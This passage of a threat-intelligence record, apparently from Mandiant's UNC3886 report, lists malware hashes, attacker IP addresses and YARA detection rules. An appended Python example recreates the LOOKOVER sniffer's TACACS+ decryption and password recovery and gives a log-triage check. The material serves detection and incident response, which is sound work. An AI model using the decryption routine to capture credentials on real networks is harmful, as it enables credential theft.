0f76936e237bd87dfa2378106099a673 - UTILITY\r\nu.py d18a5f1e8c321472a31c27f4985834a4 - UTILITY\r\nvmware_ntp.sh 4ddca39b05103aeb075ebb0e03522064 - LAUNCHER\r\nwp 0e43a0f747a60855209b311d727a20bf GHOSTTOWN UTILITY\r\naububbaditd 1d89b48548ea1ddf0337741ebdb89d92 LOOKOVER SNIFFER\r\nbubba_sniffer ecb34a068eeb2548c0cbe2de00e53ed2 LOOKOVER SNIFFER\r\nksbubba 89339821cdf6e9297000f3e6949f0404 MOPSLED.LINUX BACKDOOR\r\nksbubba.service c870ea6a598c12218e6ac36d791032b5 MOPSLED.LINUX LAUNCHER\r\n99-bubba.rules 1079d416e093ba40aa9e95a4c2a5b61f REPTILE LAUNCHER\r\nadmin 
ed9be20fea9203f4c4557c66c5b9686c REPTILE BACKDOOR\r\nauthd 568074d60dd4759e963adc5fe9f15eb1 REPTILE BACKDOOR\r\nbubba 4d5e4f64a9b56067704a977ed89aa641 REPTILE LAUNCHER\r\nbubba_icmp 1b7aee68f384e252286559abc32e6dd1 REPTILE BACKDOOR\r\nbubba_loader b754237c7b5e9461389a6d960156db1e REPTILE BACKDOOR\r\nclient f41ad99b8a8c95e4132e850b3663cb40 REPTILE BACKDOOR\r\ndash 48f9bbdb670f89fce9c51ad433b4f200 REPTILE LAUNCHER\r\nlistener 4fb72d580241f27945ec187855efd84a REPTILE BACKDOOR\r\npacket e2cdf2a3380d0197aa11ff98a34cc59e REPTILE CONTROLLER\r\nauthdd fd3834d566a993c549a13a52d843a4e1 REPTILE.SHELL BACKDOOR\r\nauthdd 4282de95cc54829d7ac275e436e33b78 REPTILE.SHELL BACKDOOR\r\nbubba_reverse c9c00c627015bd78fda22fa28fd11cd7 REPTILE.SHELL BACKDOOR\r\nunknown 047ac6aebe0fe80f9f09c5c548233407 REPTILE.SHELL BACKDOOR\r\nusbubbaxd bca2ccff0596a9f102550976750e2a89 RIFLESPINE BACKDOOR\r\naudit 3a8a60416b7b0e1aa5d17eefb0a45a16 TINYSHELL CONTROLLER\r\nlang_ext 6e248f5424810ea67212f1f2e4616aa5 TINYSHELL BACKDOOR\r\nsync 5d232b72378754f7a6433f93e6380737 TINYSHELL CONTROLLER\r\nx64 3c7316012cba3bbfa8a95d7277cda873 VIRTUALGATE DROPPER\r\nndc4961 9c428a35d9fc1fdaf31af186ff6eec08 VIRTUALPEER UTILITY\r\nlsu_lsi_.v05 2716c60c28cf7f7568f55ac33313468b VIRTUALPIE ARCHIVE\r\nvmsyslog.py 61ab3f6401d60ec36cd3ac980a8deb75 VIRTUALPIE BACKDOOR\r\nvmware_local.sh bd6e38b6ff85ab02c1a4325e8af29ce4 VIRTUALPIE LAUNCHER\r\ncleanupStatefulHost.sh 9ef5266a9fdd25474227c3e33b8e6d77 VIRTUALPITA LAUNCHER\r\nclient a7cd7b61d13256f5478feb28ab34be72 VIRTUALPITA BACKDOOR\r\nduci cd3e9e4df7e607f4fe83873b9d1142e3 VIRTUALPITA BACKDOOR\r\npayload1 62bed88bd426f91ddbbbcfcd8508ed6a VIRTUALPITA ARCHIVE\r\nrdt 8e80b40b1298f022c7f3a96599806c43 VIRTUALPITA BACKDOOR\r\nrhttpproxy 
c9f2476bf8db102fea7310abadeb9e01 VIRTUALPITA BACKDOOR\r\nrhttpproxy-IO 2c28ec2d541f555b2838099ca849f965 VIRTUALPITA BACKDOOR\r\nrpci 2bade2a5ec166d3a226761f78711ce2f VIRTUALPITA BACKDOOR\r\nssh 969d7f092ed05c72f27eef5f2c8158d6 VIRTUALPITA BACKDOOR\r\nnds4961l.so 084132b20ed65b2930129b156b99f5b3 VIRTUALSHINE BACKDOOR\r\nNetwork-Based Indicators\r\nIPv4 ASN Netblock\r\n8.222.218.20 45102 Alibaba\r\n8.222.216.144 45102 Alibaba\r\n8.219.131.77 45102 Alibaba\r\n8.219.0.112 45102 Alibaba\r\n8.210.75.218 45102 Alibaba\r\n8.210.103.134 45102 Alibaba\r\n47.252.54.82 45102 Alibaba\r\n47.251.46.35 45102 Alibaba\r\n47.246.68.13 45102 Alibaba\r\n47.243.116.155 45102 Alibaba\r\n47.241.56.157 45102 Alibaba\r\n45.77.106.183 20473 Choopa, LLC\r\n45.32.252.98 20473 Choopa, LLC\r\n207.246.64.38 20473 Choopa, LLC\r\n149.28.122.119 20473 Choopa, LLC\r\n155.138.161.47 20473 Gigabit Hosting Sdn Bhd\r\n154.216.2.149 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.217 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.210 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.209 55720 Gigabit Hosting Sdn Bhd\r\n58.64.204.165 17444 HKBN Enterprise Solutions Limited\r\n58.64.204.142 17444 HKBN Enterprise Solutions Limited\r\n58.64.204.139 17444 HKBN Enterprise Solutions Limited\r\n165.154.7.145 135377 Ucloud Information Technology Hk Limited\r\n165.154.135.108 135377 Ucloud Information Technology Hk Limited\r\n165.154.134.40 135377 Ucloud Information Technology Hk Limited\r\n152.32.231.251 135377 Ucloud Information Technology Hk Limited\r\n152.32.205.208 135377 Ucloud Information Technology Hk Limited\r\n152.32.144.15 135377 Ucloud Information Technology Hk Limited\r\n152.32.129.162 135377 Ucloud Information Technology Hk Limited\r\n123.58.207.86 135377 Ucloud Information Technology 
Hk Limited\r\n123.58.196.34 135377 Ucloud Information Technology Hk Limited\r\n118.193.63.40 135377 Ucloud Information Technology Hk Limited\r\n118.193.61.71 135377 Ucloud Information Technology Hk Limited\r\n118.193.61.178 135377 Ucloud Information Technology Hk Limited\r\nThese addresses sit in commodity cloud and VPS ranges (Alibaba, Choopa, Gigabit Hosting, HKBN, UCloud) that are regularly reassigned, so they are best used as retrospective hunting indicators for the campaign period rather than as permanent block-list entries.\r\nYARA Rules\r\nrule M_Sniffer_LOOKOVER_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $str1 = \"TKEY\"\r\n        $str2 = \"FILTER\"\r\n        $str3 = \"DEVICE\"\r\n        $str4 = \"SNFILENAME\"\r\n        $str5 = \"/var/lib/libsyslog.so\"\r\n        $code = {8B 55 F8 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00\r\n                 48 8B 45 E0 48 01 C8 8B 00 88 02 8B 45 F8 83 C0 01 89 C2 48 8B 45 E8 48 01\r\n                 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 08 88\r\n                 02 8B 45 F8 83 C0 02 89 C2 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00\r\n                 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 10 88 02 8B 45 F8 83 C0 03 89 C2 48\r\n                 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B\r\n                 00 C1 E8 18 88 02 83 45 FC 01 83 45 F8 04}\r\n    condition:\r\n        // 0x464c457f is the little-endian ELF magic\r\n        uint32(0) == 0x464c457f and filesize \u003c 5MB and all of them\r\n}\r\nrule M_Utility_GHOSTTOWN_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $code1 = { 2F 76 61 72 2F 6C 6F 67 } // \"/var/log\"\r\n        $code2 = { 2F 76 61 72 2F 72 75 6E } // \"/var/run\"\r\n        $debug1 = \"=== results ===\" ascii\r\n        $debug2 = \"=== %s ===\" ascii\r\n        $debug3 = \"searching record in file %s\" ascii\r\n        $debug4 = \"record not matched, not modifing %s\" ascii\r\n        $debug5 = \"delete %d records in %s\" ascii\r\n        $debug6 = \"NEVER_LOGIN\" ascii\r\n        $debug7 = \"you need to specify a username to clear\" ascii\r\n        $pattern1 = \"%-10s%-10s%-10s%-20s%-10s\" ascii\r\n        $pattern2 = \"%-15s%-10s%-15s%-10s\" ascii\r\n    condition:\r\n        uint32(0) == 0x464C457F and all of them\r\n}\r\nrule M_Utility_VIRTUALPEER_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $vmci_socket_family = {B? 00 00 00 00 B? 
02 00 00 00 B? 28 00\r\n                 00 00 e8 [4-128] B? 00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B?\r\n                 00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B? B8 07 00 00 [0-8] b?\r\n                 00 00 00 00 e8}\r\n        $vmci_socket_marker1 = \"/dev/vsock\" ascii wide\r\n        $vmci_socket_marker2 = \"/vmfs/devices/char/vsock/vsock\" ascii wide\r\n        $vmci_socket_init_bind_listen = {e8 [4] 89 45 [4-64] 8B 45 ?? b?\r\n                 00 00 00 00 b? 01 00 00 00 [0-4] e8 [4-128] B? 10 00 00 00 [1-16] e8\r\n                 [4-128] BE 01 00 00 00 [1-16] e8 [4] 83 F8 FF}\r\n        $socket_read_write = {BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48\r\n                 85 C0 [1-64] BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48 85 C0 7e ?? eb}\r\n        $marker1 = \"nc \u003cport\u003e\"\r\n    condition:\r\n        uint32(0) == 0x464c457f and all of them\r\n}\r\nrule M_Hunting_VIRTUALPITA_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        // the 4-byte groups below decode to: pid in `ps -c | grep vmsyslogd | awk '{ print $1 }'`; do kill -9 $pid; done\r\n        $forpid = { 70 69 64 20 [0-10] 69 6E 20 60 [0-10] 70 73 20 2D [0-10]\r\n                 63 20 7C 20 [0-10] 67 72 65 70 [0-10] 20 76 6D 73 [0-10] 79 73 6C 6F [0-10]\r\n                 67 64 20 7C [0-10] 20 61 77 6B [0-10] 20 27 7B 20 [0-10] 70 72 69 6E [0-10]\r\n                 74 20 24 31 [0-10] 20 7D 27 60 [0-10] 3B 20 64 6F [0-10] 20 6B 69 6C [0-10]\r\n                 6C 20 2D 39 [0-10] 20 24 70 69 [0-10] 64 3B 20 64 [0-10] 6F 6E 65 00 }\r\n        // the 4-byte groups below decode to: /usr/lib/vmware/vmsyslog/bin/vmsyslogd\r\n        $vmsyslogd = { 2F 75 73 72 [0-10] 2F 6C 69 62 [0-10] 2F 76 6D 77\r\n                 [0-10] 61 72 65 2F [0-10] 76 6D 73 79 [0-10] 73 6C 6F 67 [0-10] 2F 62 69 6E\r\n                 [0-10] 2F 76 6D 73 [0-10] 79 73 6C 6F [0-10] 67 64 00 00 }\r\n    condition:\r\n        uint32(0) == 0x464c457f and any of them\r\n}\r\nrule M_APT_Launcher_REPTILE_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $str1 = {B8 00 00 00 00 E8 A1 FE FF FF 48 8B 85 40 FF FF FF 48\r\n                 83 C0 08 48 8B 00 BE 00 00 00 00 48 89 C7 B8 00 00 00 00 E8 ??\r\n                 FD FF FF 89 45 ?8 48 8D 95 50 FF FF FF 8B 45 ?8 48 89 D6 89 C7\r\n                 E8 ?? 0? 00 00 48 8B 45 80 48 89 45 F0 48 8B 45 F0 48 89 C7 E8\r\n                 ?? F? 
FF FF 48 89 45 ?8 48 8B 55 F0 48 8B 4D ?8 8B 45 ?8 48 89\r\n                 CE 89 C7 E8 ?? FC FF FF 48 8B 55 F0 48 8B 45 ?8 B9 4? 0C 40 00\r\n                 48 89 C6 BF AF 00 00 00 B8 00 00 00 00 E8 ?? FC FF FF E8 ?? FC\r\n                 FF FF 8B 00 83 F8 25 75 07 C7 45 ?C 00 00 00 00 }\r\n        $str2 = {81 7D F? FF 03 00 00 7E E9 BE 02 00 00 00 BF ?? 0C 40\r\n                 00 B8 00 00 00 00 E8 ?? F? FF FF 89 45 F? 8B 45 F? BE 01 00 00\r\n                 00 89 C7 E8 ?? FD FF FF 8B 45 F? BE 02 00 00 00 89 C7 E8 ?? F?\r\n                 FF FF C9 C3}\r\n    condition:\r\n        uint32(0) == 0x464C457F and all of them\r\n}\r\nrule M_APT_Backdoor_VIRTUALSHINE_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $str1 = \"/dev/vsock\"\r\n        $str2 = \"/vmfs/devices/char/vsock/vsock\"\r\n        $str3 = \"nds4961l \u003ccid\u003e \u003cvport\u003e\"\r\n        $str4 = \"[!] VMCISock_GetAFValue().\"\r\n        $str5 = \"[+] Connected to server.[ %s:%s ]\"\r\n        $str6 = \"TERM=xterm\"\r\n        $str7 = \"PWD=/tmp/\"\r\n    condition:\r\n        uint32(0) == 0x464C457F and all of them\r\n}\r\nrule M_APT_BACKDOOR_MOPSLED_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $x = { e8 ?? ?? ?? ?? 85 c0 0f 85 ?? ?? ?? ?? 4? 8d ?? ?4 ?8\r\n               be ?? ?? ?? ?? e8 ?? ?? ?? ?? 84 c0 0f 84 ?? ?? ?? ?? 4? 8b 94 ?? ?? ?? ??\r\n               ?? 4? 8b 44 ?? ?? 4? 89 e1 [0-6] be ?? ?? ?? ?? b? ?? ?? ?? ?? 4? 89 10 8b\r\n               94 ?? ?? ?? ?? ?? [0-6] 89 50 08 4? 8b 54 ?? ?? c7 42 0c ?? ?? ?? ?? e8\r\n               ?? ?? ?? ?? }\r\n    condition:\r\n        // uint8(4) == 2 restricts the match to 64-bit ELF files\r\n        uint32(0) == 0x464c457f and uint8(4) == 2 and filesize \u003c 5MB and $x\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"
	],
	"report_names": [
		"uncovering-unc3886-espionage-operations"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9df8987a-27fc-45c5-83b0-20dceb8288af",
			"created_at": "2025-10-29T02:00:51.836932Z",
			"updated_at": "2026-04-10T02:00:05.253487Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"UNC3886"
			],
			"source_name": "MITRE:UNC3886",
			"tools": [
				"MOPSLED",
				"VIRTUALPIE",
				"CASTLETAP",
				"THINCRUST",
				"VIRTUALPITA",
				"RIFLESPINE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d",
			"created_at": "2024-08-28T02:02:09.711951Z",
			"updated_at": "2026-04-10T02:00:04.957678Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"Fire Ant"
			],
			"source_name": "ETDA:UNC3886",
			"tools": [
				"BOLDMOVE",
				"CASTLETAP",
				"LOOKOVER",
				"MOPSLED",
				"RIFLESPINE",
				"TABLEFLIP",
				"THINCRUST",
				"Tiny SHell",
				"VIRTUALGATE",
				"VIRTUALPIE",
				"VIRTUALPITA",
				"VIRTUALSHINE",
				"tsh"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37",
			"created_at": "2023-11-04T02:00:07.663664Z",
			"updated_at": "2026-04-10T02:00:03.385989Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3886",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434367,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.pdf",
		"text": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.txt",
		"img": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.jpg"
	}
}
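The LOOKOVER packet handling and the XOR-0xEF credential logs described in the record's plain_text, as an added example written for this page in Python; it is not Mandiant's code and not the malware's own code. It reproduces the packet selection the post attributes to LOOKOVER (version 0xC0, type TAC_PLUS_AUTHEN, sequence 0x01 or 0x03, cleartext flag clear), the RFC 8907 MD5 pseudo-pad that both encrypts and decrypts a TACACS+ body, and the parsing of a PAP authentication START body, then shows how a capture file written XOR 0xEF can be recognised during triage. The user name, password, session ID, port and remote address are constructed sample values; the key 7ujm^YHN is the default the post reports inside the sample; the `looks_like_xor_ef_log` heuristic is this example's own triage filter, not a published signature.

```python
"""Added example (not Mandiant's code and not LOOKOVER itself): reproduce the packet
selection and RFC 8907 decryption that the post attributes to LOOKOVER, parse the
resulting authentication START body, and recognise the XOR-0xEF log files that both
LOOKOVER and the backdoored tac_plus write. All packet contents are constructed."""
import hashlib
import struct

TAC_PLUS_AUTHEN = 0x01              # header 'type' for authentication packets
TAC_PLUS_UNENCRYPTED_FLAG = 0x01    # flags bit: set => body is cleartext
TAC_PLUS_VERSION = 0xC0             # major 0xC, minor 0x0
HEADER_LEN = 12
LOG_XOR_KEY = 0xEF                  # single-byte key applied to the credential logs
DEFAULT_TKEY = b"7ujm^YHN"          # default pre-shared key embedded in the sample (from the post)


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 section 4.5: pad = MD5(session_id|key|version|seq_no) chained with the previous digest."""
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(struct.pack(">I", session_id) + key + bytes([version, seq_no]) + prev).digest()
        pad += prev
    return pad[:length]


def xor_bytes(data: bytes, pad: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, pad))


def build_authen_start(user: bytes, password: bytes, key: bytes, session_id: int,
                       seq_no: int = 1, encrypt: bool = True) -> bytes:
    """Build a PAP authentication START packet (RFC 8907 section 5.1) as a NAS would send it.
    With PAP the password sits in the START 'data' field, i.e. in the seq 0x01 packet."""
    port, rem_addr = b"tty0", b"10.0.0.5"   # constructed sample values
    # action=LOGIN(1), priv_lvl=15, authen_type=PAP(2), authen_service=LOGIN(1), then the four lengths
    body = bytes([1, 15, 2, 1, len(user), len(port), len(rem_addr), len(password)])
    body += user + port + rem_addr + password
    flags = 0 if encrypt else TAC_PLUS_UNENCRYPTED_FLAG
    header = struct.pack(">BBBBII", TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, flags, session_id, len(body))
    if encrypt:
        body = xor_bytes(body, pseudo_pad(session_id, key, TAC_PLUS_VERSION, seq_no, len(body)))
    return header + body


def lookover_filter(payload: bytes, key: bytes):
    """Mirror the selection the post describes: byte0 0xC0, byte1 AUTHEN, seq 0x01 or 0x03
    (client -> server), then decrypt unless the cleartext flag is set.
    Returns (session_id, body) for selected packets and None for everything else."""
    if (len(payload) < HEADER_LEN or payload[0] != TAC_PLUS_VERSION
            or payload[1] != TAC_PLUS_AUTHEN or payload[2] not in (0x01, 0x03)):
        return None
    version, _, seq_no, flags, session_id, length = struct.unpack(">BBBBII", payload[:HEADER_LEN])
    body = payload[HEADER_LEN:HEADER_LEN + length]
    if not flags & TAC_PLUS_UNENCRYPTED_FLAG:
        body = xor_bytes(body, pseudo_pad(session_id, key, version, seq_no, len(body)))
    return session_id, body


def parse_authen_start(body: bytes) -> dict:
    """Split a decrypted START body into its variable-length fields; 'data' is the PAP password."""
    user_len, port_len, rem_len, data_len = body[4:8]
    fields, off = {}, 8
    for name, n in (("user", user_len), ("port", port_len), ("rem_addr", rem_len), ("data", data_len)):
        fields[name] = body[off:off + n]
        off += n
    return fields


def encode_log(records: list) -> bytes:
    """Write records the way the capture tools do: newline-joined text XORed with 0xEF."""
    return bytes(b ^ LOG_XOR_KEY for b in b"\n".join(records) + b"\n")


def decode_log(blob: bytes) -> bytes:
    return bytes(b ^ LOG_XOR_KEY for b in blob)


def looks_like_xor_ef_log(blob: bytes, threshold: float = 0.9) -> bool:
    """Triage heuristic (this example's own, not a published signature) for unexplained files
    under /var: content that only becomes printable after XOR with 0xEF is consistent with a
    LOOKOVER or backdoored tac_plus credential log."""
    def printable_ratio(data: bytes) -> float:
        return sum(32 <= c < 127 or c in (9, 10, 13) for c in data) / max(len(data), 1)
    return printable_ratio(decode_log(blob)) >= threshold and printable_ratio(blob) < threshold


if __name__ == "__main__":
    pkt = build_authen_start(b"netadmin", b"S3cret!", DEFAULT_TKEY, 0x1234ABCD)
    sid, body = lookover_filter(pkt, DEFAULT_TKEY)
    creds = parse_authen_start(body)
    print(hex(sid), creds["user"], creds["data"])
    log = encode_log([b"10.0.0.5 " + creds["user"] + b" " + creds["data"]])
    print(looks_like_xor_ef_log(log), decode_log(log))
```

Run stand-alone it prints the recovered user and password and decodes the constructed log. The same pseudo_pad serves both directions, which is why the only secret the sniffer needed was the pre-shared key (the required TKEY input): anyone holding that key and a packet capture on the server's network segment can recover every credential passing through, so after an intrusion of this kind the TACACS+ key has to be rotated along with the captured credentials.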